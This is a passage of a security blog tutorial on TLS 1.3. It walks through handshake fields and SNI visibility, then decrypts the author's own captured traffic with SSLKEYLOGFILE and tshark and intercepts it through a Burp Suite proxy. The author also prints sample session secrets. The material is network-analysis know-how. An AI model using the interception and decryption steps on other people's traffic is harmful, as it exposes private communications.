<span style="color: white;"> Key Exchange: b890eba94dad2c2bd955684a395592e1d26ed73308d4d9eed988912afafc5a13</span>
<span style="color: white;"> 4: Extension: supported_versions (len=2)</span>
<span style="color: white;"> Type: supported_versions (43)</span>
<span style="color: white;"> Length: 2</span>
<span style="color: white;"> Supported Version: TLS 1.3 (0x0304)</span>
<span style="color: white;"> [JA3S Fullstring: 771,4866,51-43]</span>
<span style="color: white;"> [JA3S: 907bf3ecef1c987c889946b737b43de8]</span>
<span style="color: white;"> 5: TLSv1.3 Record Layer: Change Cipher Spec Protocol: Change Cipher Spec</span>
<span style="color: white;"> Content Type: Change Cipher Spec (20)</span>
<span style="color: white;"> Version: TLS 1.2 (0x0303)</span>
<span style="color: white;"> Length: 1</span>
<span style="color: white;"> Change Cipher Spec Message</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>We already learned from the Client Hello that fields such as version, session_id, compression_method, etc., are deprecated. No need to touch on them again. Keeping it simple.</p><p>1: Handshake Type: Server Hello in response to the Client's Hello.</p><p>2. Cipher Suite: The value selected represents the chosen cipher suite from the Client's Hello message. As we see in this list, the server choose the first value. Considering the client already sent its <i>key_share</i> and the server has now chosen the algorithm, the server can then generate it's <i>key_share</i> which it will send to the client. At the same time, the server can use the client's <i>key_share</i> and its <i>key_share </i>to generate the symmetric key needed for encryption. </p><p>3. <i>Key_share</i>: The server calculates its <i>Key_share</i> value based on the first item in the client's list of <i>supported_groups</i>.</p><p>4. <i>supported_versions</i>, identify this as TLS 1.3.</p><p>5. The communication transition to encrypted. Not much for us to do beyond here. This is where however, the Server Certificate, etc., is sent for the client to authenticate the server. </p><p>Looking at frame 8, we see encrypted application data and the protocol being HTTP.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.3.pcap -Y "frame.number == 8" -V | sed '1,89d' </span>
<span style="color: white;"> TLSv1.3 Record Layer: Application Data Protocol: Hypertext Transfer Protocol</span>
<span style="color: white;"> Opaque Type: Application Data (23)</span>
<span style="color: white;"> Version: TLS 1.2 (0x0303)</span>
<span style="color: white;"> Length: 4567</span>
<span style="color: white;"> Encrypted Application Data: 9b533b25659e1404e41388747c1a403679bf9b986c3127f65f13a5a0a01fd03aa21b40c7…</span>
<span style="color: white;"> [Application Data Protocol: Hypertext Transfer Protocol]</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><div><div>With all of this understanding now out of the way, let's look to decrypting this communication. </div><div><br /></div><div>Before we decrypt anything, if I said to you, "we could see traffic occurring over port 443 without decrypting", you may say that is not possible because we know port 443 traffic is normally encrypted. This is correct. However, what we should notice above in our earlier learning, is that when this connection is starting up, it is in clear text. There is also an extension called "<i>Server Name Indication extension</i>"</div></div><div><br /></div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.3.pcap -Y "tls.handshake.type == 1" -V | sed '1,105d;114,$d' </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">Extension: server_name</span></b><span style="color: white;"> (len=24)</span></span>
<span style="color: white;"> Type: server_name (0)</span>
<span style="color: white;"> Length: 24</span>
<span style="color: white;"> Server Name Indication extension</span>
<span style="color: white;"> Server Name list length: 22</span>
<span style="color: white;"> Server Name Type: host_name (0)</span>
<span style="color: white;"> Server Name length: 19</span>
<span><span style="color: white;"> Server Name: </span><b><span style="color: #fcff01;">www.securitynik.com</span></b></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>So as seen above, even without decrypting, we are able to see the domain the client is going to. This is exactly the feature that my tool pktItel.py (<a href="https://github.com/SecurityNik/pktIntel">https://github.com/SecurityNik/pktIntel</a>) uses. </p><p>Let's decrypt from a few perspectives. </p><p><span style="font-size: large;"><br />First let's decrypt using the </span><i style="font-size: large;">SSLKEYLOGFILE.</i></p><p>To decrypt from the browser or from a command line tool such as <i>curl</i> that supports SSL decryption, we need to set the SSLKEYLOGFILE environment variable. Let's do this!</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ export SSLKEYLOGFILE=/home/kali/sslkeylog.file</span>
<span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ echo $SSLKEYLOGFILE </span>
<span style="color: white;">/home/kali/sslkeylog.file</span>
<span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ ls sslkeylogfile*.*</span>
<span style="color: white;">ls: cannot access 'sslkeylogfile*.*': No such file or directory</span>
</pre></div>
</div><div><br /></div><p>First I create environment variable via the export command.</p><p>Next I validated the <i>SSLKEYLOGFILE </i>environment variable was created by using the <i>echo </i>command.</p><p>When the variable was created, it pointed to a file. When I ran <i>ls</i>, we see the file does not currently exists. If this was setup correctly, the file will be created automatically, once they (pre-)master secrets are written to it.</p><p><br />Setup TShark to capture the traffic.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tshark --interface eth0 -w /tmp/curl.pcapng -f 'port 443 and host www.securitynik.com'</span>
<span style="color: white;">Running as user "root" and group "root". This could be dangerous.</span>
<span style="color: white;">Capturing on 'eth0'</span>
<span style="color: white;"> ** (tshark:151432) 13:57:39.885233 [Main MESSAGE] -- Capture started.</span>
<span style="color: white;"> ** (tshark:151432) 13:57:39.885309 [Main MESSAGE] -- File: "/tmp/curl.pcapng"</span>
</pre></div>
<br /><br /><div>Launching <i>curl</i> ...<div><p></p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ curl --silent https://www.securitynik.com --tlsv1.3 --tls-max 1.3 --output /tmp/index.txt</span>
</pre></div>
</div><div><br /></div><div><div>Revisiting <i>SSLKEYLOGFILE</i>, we see.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ ls sslkeylog.file -l</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 938 Jul 24 14:00 sslkeylog.file</span>
</pre></div>
</div><div><br /></div><div><div>Looking inside the file we see one entry for our curl session;</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ head sslkeylog.file </span>
<span style="color: white;">SERVER_HANDSHAKE_TRAFFIC_SECRET edbe2472eead5da6a5c23a3eaca03e1b7d16a42bb9d29ea451bc8588c4bf7d15 81965dd5815a94c08b183d6967e92a9d425d579acc64e29fd381dbd9ba370db5070fc906d3ac46f4dd0c093620d06dac</span>
<span style="color: white;">EXPORTER_SECRET edbe2472eead5da6a5c23a3eaca03e1b7d16a42bb9d29ea451bc8588c4bf7d15 7b36723ef808a75158ffc36e40c0928af50022585b7b436a5a017b79927d961daf06a237d8e683435d86539586136f42</span>
<span style="color: white;">SERVER_TRAFFIC_SECRET_0 edbe2472eead5da6a5c23a3eaca03e1b7d16a42bb9d29ea451bc8588c4bf7d15 17403da98e23b307d25b0d5f7e3987f53f9636b29b51042fdec9abe29ea2c717afb723a3c69b365b0682f636d6c13503</span>
<span style="color: white;">CLIENT_HANDSHAKE_TRAFFIC_SECRET edbe2472eead5da6a5c23a3eaca03e1b7d16a42bb9d29ea451bc8588c4bf7d15 c648aa60612a3437d113105bc22979ba6de182d0ab0b85e48403a59570e5a690c1fb502976993d5c145b888651f56cbc</span>
<span style="color: white;">CLIENT_TRAFFIC_SECRET_0 edbe2472eead5da6a5c23a3eaca03e1b7d16a42bb9d29ea451bc8588c4bf7d15 56122f06fef5db1ba481b9bd282cd7ec00a8e5246f901d1ae5c650c9bbe1b15cfbb6777ca04392efa0a3ab890d01fbd9</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>What are those values? See the reference section. Basically those are the secrets used to encrypt the application data or the handshake, etc.</p><p>Note, because we set the <i>SSLKEYLOGFILE </i>environment variable, if we open our browser and it has been compiled with this option, then similarly the connections your browsers make, will result in information be written to this file. Hence, I am not going to repeat this with a browser. You can test it for yourself.</p><p>How do we decrypt this? Let's try to look at the protocol hierarchy of the undecrypted traffic with TShark.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tshark -n -r /tmp/curl.pcapng -q -z io,phs 2>/dev/null </span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:622 bytes:1095342</span>
<span style="color: white;"> ip frames:622 bytes:1095342</span>
<span style="color: white;"> tcp frames:622 bytes:1095342</span>
<span style="color: white;"> tls frames:313 bytes:1078582</span>
<span style="color: white;"> tcp.segments frames:121 bytes:504319</span>
<span style="color: white;"> tls frames:101 bytes:496976</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div>Clearly, beyond the "<i>tls</i>" we are unable to conclude what type of traffic is following TLS. Let's fix that by leveraging the <i>sslkeylog.file</i> we created via the SSLKEYLOGFILE environment variable. We need to overwrite the <i>TShark </i>configuration by telling it to use the <i>sslkeylog.file</i> as input for decryption.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ sudo tshark -n -r /tmp/curl.pcapng -q -z io,phs </span><b><span style="color: #fcff01;">-o "tls.keylog_file: /home/kali/sslkeylog.file"</span></b><span style="color: white;"> 2>/dev/null </span></span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:622 bytes:1095342</span>
<span style="color: white;"> ip frames:622 bytes:1095342</span>
<span style="color: white;"> tcp frames:622 bytes:1095342</span>
<span style="color: white;"> tls frames:313 bytes:1078582</span>
<span style="color: white;"> http2 frames:52 bytes:227960</span>
<span style="color: white;"> http2 frames:2 bytes:256</span>
<span style="color: white;"> http2 frames:1 bytes:140</span>
<span style="color: white;"> tls.segments frames:45 bytes:227055</span>
<span style="color: white;"> tcp.segments frames:9 bytes:55662</span>
<span style="color: white;"> tls frames:8 bytes:51372</span>
<span style="color: white;"> http2 frames:2 bytes:17052</span>
<span style="color: white;"> tls.segments frames:2 bytes:17052</span>
<span style="color: white;"> http2 frames:1 bytes:6333</span>
<span style="color: white;"> tls.segments frames:1 bytes:6333</span>
<span style="color: white;"> tcp.segments frames:112 bytes:448657</span>
<span style="color: white;"> tls frames:93 bytes:445604</span>
<span style="color: white;"> http2 frames:28 bytes:239306</span>
<span style="color: white;"> tls.segments frames:27 bytes:234102</span>
<span style="color: white;"> http2 frames:4 bytes:51048</span>
<span style="color: white;"> tls.segments frames:4 bytes:51048</span>
<span style="color: white;"> data-text-lines frames:1 bytes:5204</span>
<span style="color: white;"> tls.segments frames:1 bytes:5204</span>
<span style="color: white;"> http2 frames:1 bytes:5204</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Whow! We see now we can see all the application layer data as HTTP2. What can I do with this now? Well if I wanted to do signature based analysis we could. Let's say we are aware of the threat actor's attack tool contains a string/signature "<i>securitynik</i>". Do note, you can feed the same file to Wireshark and it can also decrypt the traffic.</div><div><br /></div><div>Let's first reassembled the session by following the TLS stream.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tshark -n -r /tmp/curl.pcapng -o "tls.keylog_file: /home/kali/sslkeylog.file" -q -z follow,tls,ascii,0 | head --lines=30</span>
<span style="color: white;">Running as user "root" and group "root". This could be dangerous.</span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Follow: tls,ascii</span>
<span style="color: white;">Filter: tcp.stream eq 0</span>
<span style="color: white;">Node 0: 142.251.41.51:443</span>
<span style="color: white;">Node 1: :0</span>
<span style="color: white;"> 64</span>
<span style="color: white;">PRI * HTTP/2.0</span>
<span style="color: white;">SM</span>
<span style="color: white;">..............d.........................</span>
<span style="color: white;"> 43</span>
<span style="color: white;">..".........A.....)-...Q..C.z.%.P.....S.*/*</span>
<span style="color: white;">40</span>
<span style="color: white;">..............d.........................</span>
<span style="color: white;"> 9</span>
<span style="color: white;">.........</span>
<span style="color: white;">9</span>
<span style="color: white;">.........</span>
<span style="color: white;">191</span>
<span style="color: white;">.........._.I|...M.j.q........d..z...Je....2.^..\e.1h.....z...Je....2.^..\e.1h.X...w.K..#...,.l..m_J..2.B...P..e...LZ7.@....RKRVO....I.R?......@....!j.:JD........B...'_v.GSER....{...-i[.D<..o</span>
<span style="color: white;">1408</span>
<span style="color: white;">.1~......<!DOCTYPE html></span>
<span style="color: white;"><html class='v2' dir='ltr' lang='en' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'></span>
<span style="color: white;"><head></span>
<span style="color: white;"><link href='https://www.blogger.com/static/v1/widgets/3566091532-css_bundle_v2.css' rel='stylesheet' type='text/css'/></span>
<span style="color: white;"><!-- ADDED BY NIK --></span>
<span style="color: white;"><script async='async' src='//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'></script></span>
<span style="color: white;"><script></span>
</pre></div>
</div><div><br /></div><div><br /></div><div><div>We should recognize immediately, we are able to see the plaintext. Remember, this should have all been encrypted.</div><div><br /></div><div>With the session reassembled, we can now use our signature based analysis tools such as your favourite IDS/IPS such as <a href="https://www.securitynik.com/2021/02/snort3-on-ubuntu-20-initial-setup.html" target="_blank">Snort</a>, Network Monitoring Framesworks such as <a href="https://www.securitynik.com/2020/06/installing-zeek-314-on-ubuntu-2004.html" target="_blank">Zeek</a> or Next Generation Firewall to inspect this traffic.</div></div><div><br /></div><div>Let's use <i>grep </i>as our signature based detection tool, looking for the string/pattern "<i>securitynik</i>"</div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tshark -n -r /tmp/curl.pcapng -o "tls.keylog_file: /home/kali/sslkeylog.file" -q -z follow,tls,ascii,0 | grep --perl-regexp --ignore-case "securitynik" --only-matching | sort | uniq --count</span>
<span style="color: white;">Running as user "root" and group "root". This could be dangerous.</span>
<span style="color: white;"> 308 securitynik</span>
<span style="color: white;"> 29 SecurityNik</span>
</pre></div>
</div><div><br /></div><div><div>There we go, we decrypted the traffic running over TLS 1.3.</div><div><br /></div><div>Ok! At this point, you are probably saying but Nik I work mostly in a Windows environment. How do I do this in Windows? Let's address this concern.</div><div><br /></div><div>Setting and verifying the environment variable on <i>Windows11</i> under the user profile.</div><div><br /></div><div>Before setting the environment variable, let's verify that <i>Microsoft Edge</i> browser is not running. Sometimes this seems to cause an issue if we add the environment variable while edge is running.</div><div><br /></div><div>Getting the process information via both <i>cmd </i>and <i>powershell</i>. Just to show different ways.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">PS C:\Users\securitynik> tasklist | findstr /i msedge </span>
<span style="color: white;">msedge.exe 7092 Console 1 98,560 K </span>
<span style="color: white;">msedge.exe 7108 Console 1 7,336 K </span>
<span style="color: white;">msedge.exe 4600 Console 1 29,444 K </span>
<span style="color: white;">msedge.exe 5592 Console 1 32,508 K </span>
<span style="color: white;">msedge.exe 2052 Console 1 18,900 K </span>
<span style="color: white;">msedge.exe 7676 Console 1 104,520 K </span>
<span style="color: white;">msedge.exe 7988 Console 1 27,212 K</span>
<span style="color: white;">PS C:\Users\securitynik> Get-Process msedge | Select-Object -Property ProcessName </span>
<span style="color: white;">ProcessName</span>
<span style="color: white;">----------- </span>
<span style="color: white;">msedge</span>
<span style="color: white;">msedge </span>
<span style="color: white;">msedge</span>
<span style="color: white;">msedge</span>
<span style="color: white;">msedge</span>
<span style="color: white;">msedge </span>
<span style="color: white;">msedge </span>
</pre></div>
</div><div><br /></div><div><div>Imagine that, all I did was start-up my computer. Did not open a browser but I have 7 instances of MSEdge running. Geez!!!</div><div><br /></div><div>Back to regular programming. Kill those processes</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">PS C:\Users\Administrator> taskkill /IM msedge.exe /F </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 7092 has been terminated. </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 7108 has been terminated. </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 4600 has been terminated. </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 5592 has been terminated. </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 2052 has been terminated. </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 7676 has been terminated. </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 7988 has been terminated.</span>
</pre></div>
</div><div><br /></div><div><div>Set the environment variable</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">PS C:\Users\Administrator> setx SSLKEYLOGFILE "$(get-location)\sslkeylog_file.txt" </span>
<span style="color: white;">SUCCESS: Specified value was saved. </span>
</pre></div>
</div><div><br /></div><div><div><div>Validate in a Powershell or CMD a new windows the environment variable has been set </div></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">C:\Users\SecurityNik>set|findstr /i ssl</span>
<span style="color: white;">SSLKEYLOGFILE=C:\Users\SecurityNik\sslkeylog_file.txt</span>
</pre></div>
</div><div><br /></div><div><div>With everything in place, let's use <i>Invoke-WebRequest</i> in <i>Powershell</i>, similar to what was done in <i>curl</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">PS C:\Users\Administrator> Invoke-WebRequest -uri https://www.securitynik.com -OutFile index.html</span>
</pre></div>
</div><div><br /></div><div><div>What is funny in this situation, is this action did not create the file. I was very much surprised by this. Maybe more testing on my part in the future.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">PS C:\Users\Administrator> dir ssl*.*</span>
</pre></div>
</div><div><br /></div><div><div>However, if I open MSEdge, this file gets created and populated.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">C:\Users\Administrator>dir ssl*.* /b</span>
<span style="color: white;">sslkeylog_file.txt </span>
</pre></div>
</div><div><br /></div><div><div>If I run <i>invoke-webrequest</i> in another Terminal while edge is running it appends the new keys to the file. This <i>invoke-webrequest</i> will require more testing as my results are inconsistent. Not interested in this right now as everything works from within <i>MSEdge</i>.</div><div><br /></div><div>Let's wrap up this post by looking at decrypting via a proxy and a browser.</div><div><br /></div><div>In this case I am using <i>Burp Suite Community Edition</i> for my proxy</div></div><div><br /></div><div>------ BurpProxy On image ------</div><div><br /></div><div><div>Validate the proxy is listening via ss</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ ss --numeric --listening --tcp --processes </span>
<span style="color: white;">State Recv-Q Send-Q Local Address:Port Peer Address:Port Process </span>
<span><b><span style="color: #fcff01;">LISTEN </span></b><span style="color: white;">0 50 </span><b><span style="color: #fcff01;">[::ffff:127.0.0.1]</span></b><span style="color: white;">:</span></span><span style="color: #fcff01;"><b>8080</b></span><span style="color: white;"> *:* users:(("java",pid=210127,fd=26)) </span>
</pre></div>
</div><div><br /></div><div><div>Configure the browser to use the proxy.</div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2rcOQhLZY2b4aGPXAn2PluxYIKy5S9_-cQPNQ-d_YEbm3G4LgScNK4Beod2HIHpZaIJKecSkm7BqLNsmPm28dk9tpRwVNEPqardz_WCbYBaJPEHres1nOl5bYpzw3cq1U5PMv00-gQUK7BDjvO42-q2PIW5rlyvU2sC6RrjbczeLj0y-7DgJEN7kyEUs/s828/burpe-browser-proxy-config.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="828" height="528" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2rcOQhLZY2b4aGPXAn2PluxYIKy5S9_-cQPNQ-d_YEbm3G4LgScNK4Beod2HIHpZaIJKecSkm7BqLNsmPm28dk9tpRwVNEPqardz_WCbYBaJPEHres1nOl5bYpzw3cq1U5PMv00-gQUK7BDjvO42-q2PIW5rlyvU2sC6RrjbczeLj0y-7DgJEN7kyEUs/w640-h528/burpe-browser-proxy-config.PNG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;"><div class="separator" style="clear: both;">In my browser, I try to go to <i>https://www.securitynik.com</i> and I see the request is intercepted by the proxy. </div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrEnJ6M3122BHOI50pfvbkUaRzsp6CtA0paBSthIugWTA2UBjTQsO9PYtoDt1Tuz0t-VqrqmyA-ri7TvfIKqTX8mmWHuqcHkdTx0uvh0utBWtLihwR5mnJhALIVWgtuF4KraIXOV08ow6G0LURWdvgDy2X--2wQVaOi4BMDvxtHRZG2b0gdH39qa1Q5ls/s891/burpe-browser-error-securitynik.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="718" data-original-width="891" height="516" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrEnJ6M3122BHOI50pfvbkUaRzsp6CtA0paBSthIugWTA2UBjTQsO9PYtoDt1Tuz0t-VqrqmyA-ri7TvfIKqTX8mmWHuqcHkdTx0uvh0utBWtLihwR5mnJhALIVWgtuF4KraIXOV08ow6G0LURWdvgDy2X--2wQVaOi4BMDvxtHRZG2b0gdH39qa1Q5ls/w640-h516/burpe-browser-error-securitynik.PNG" width="640" /></a></div><br /><div><br /></div></div><div>At this point, some people may say "Advanced" and "Accept the Risk and Continue" the attempt to accept the error. That could be a bad move. Let's do so however for the purpose of this blog post. With the risk being accepted.</div><div><br /></div><div>Forward the intercepted request within the proxy ...</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGGx0wGZCiJEZdLC2BjDpU1nNgPlhKfnP2_WZXq-Q6ZA34MGk4fOtzAHXNqtH_c6t7L_psIqNk3YYB3szFOXgwVk9iMNC8NZsDA5CYPk90NbQAFY8sQdhKKzzUS5BUHj7dmMcusDGRqhONoKiXhcrehpisgfGuDp5XeZ2OBXCMeA9sCSPWC3BjxkEv_7E/s993/burpe-accepting-the-risk.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="476" data-original-width="993" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGGx0wGZCiJEZdLC2BjDpU1nNgPlhKfnP2_WZXq-Q6ZA34MGk4fOtzAHXNqtH_c6t7L_psIqNk3YYB3szFOXgwVk9iMNC8NZsDA5CYPk90NbQAFY8sQdhKKzzUS5BUHj7dmMcusDGRqhONoKiXhcrehpisgfGuDp5XeZ2OBXCMeA9sCSPWC3BjxkEv_7E/w640-h306/burpe-accepting-the-risk.PNG" width="640" /></a></div><div><br /></div><div>... and now we see in Burpe also the response in clear text. Because we forwarded the request.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXI0gvnnU4exC7djRZ43Ut5CQegCTLpkBOkS4ba6aACsGwfnd3Gs-qqg7VmM19wCyuapBuPb7bEqLqF8xHhZiY0IuNvRapy80Vw-T2do_Qrq4RSrO-_SC1RQkwrR7v4mnwV_cy3QTCk1zL10KOsiGzrM0ZRLmTJ_4I-dVqLLPFp6PoQPtrceZN7c4o4k0/s983/burpe-seeing-the-clear-traffic-on-proxy.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="814" data-original-width="983" height="530" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXI0gvnnU4exC7djRZ43Ut5CQegCTLpkBOkS4ba6aACsGwfnd3Gs-qqg7VmM19wCyuapBuPb7bEqLqF8xHhZiY0IuNvRapy80Vw-T2do_Qrq4RSrO-_SC1RQkwrR7v4mnwV_cy3QTCk1zL10KOsiGzrM0ZRLmTJ_4I-dVqLLPFp6PoQPtrceZN7c4o4k0/w640-h530/burpe-seeing-the-clear-traffic-on-proxy.PNG" width="640" /></a></div><br /><div><br /></div><div><div>While I captured the traffic from my blog, the takeaway for you is, once a proxy is in place, then you should be aware that the traffic can not only be seen but also manipulated. This is true, even if TLS is in use. </div><div><br /></div><div>But what about HTTP Strict Transport Security (HSTS)?</div><div><br /></div><div>HSTS is a response header sent by the server, stating that the site should only be accessed using HTTPS. HSTS can be used to mitigate the risk of man-in-the-middle types of attacks.</div><div><br /></div><div>The browser will reports that the site supports HSTS and thus if we wanted to access that site, we would have to create an exception. </div><div><br /></div><div><br /></div><div>References:</div><div><a 